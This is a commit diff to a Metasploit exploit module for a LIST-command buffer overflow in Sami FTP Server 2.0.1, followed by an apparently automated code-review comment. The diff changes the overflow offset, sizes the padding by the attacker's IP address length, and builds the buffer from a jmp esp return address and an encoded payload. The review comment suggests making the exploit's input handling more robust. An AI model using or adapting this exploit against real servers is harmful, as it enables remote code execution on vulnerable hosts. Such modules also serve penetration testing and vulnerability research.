Uses IP address length in offset calculation

unstable
dougsko 2013-03-18 16:18:04 -03:00
parent 3d92d6e977
commit fb90a1b497
1 changed files with 10 additions and 4 deletions


@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
'Description' => %q{
A buffer overflow is triggered when a long LIST
command is sent to the server and the user views the Log tab.
command is sent to the server while the user is viewing the Logs tab.
},
'Platform' => 'win',
'Author' =>
@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote
'Windows Universal',
{
'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
'Offset' => 219,
'Offset' => 225,
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 27 2013'))
register_options(
[
OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
], self.class)
end
def exploit
connect_login
sleep 1
buf = rand_text(target['Offset'], payload_badchars)
ip_length = datastore['IPADDR'].length - 3
buf = rand_text_alphanumeric(target['Offset'] - ip_length)
buf << [ target['Ret'] ].pack('V')
buf << payload.encoded
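Review bot: The `- 3` in `ip_length = datastore['IPADDR'].length - 3` is an unexplained constant, and alongside the `'Offset'` change from 219 to 225 nothing on the new side records what the padding length is measured against. Add a comment above that line, for example `# padding shrinks by the length of the address text; the 3 accounts for <author to state>`, so a later edit to either number does not silently break the relationship. `IPADDR` is also a free-form `OptString`, so a mistyped or non-address value changes the computed length without raising any error; declaring it as `OptAddress` would reject such input when options are validated. The body of `exploit` continues past the end of this hunk, so this covers only the lines shown.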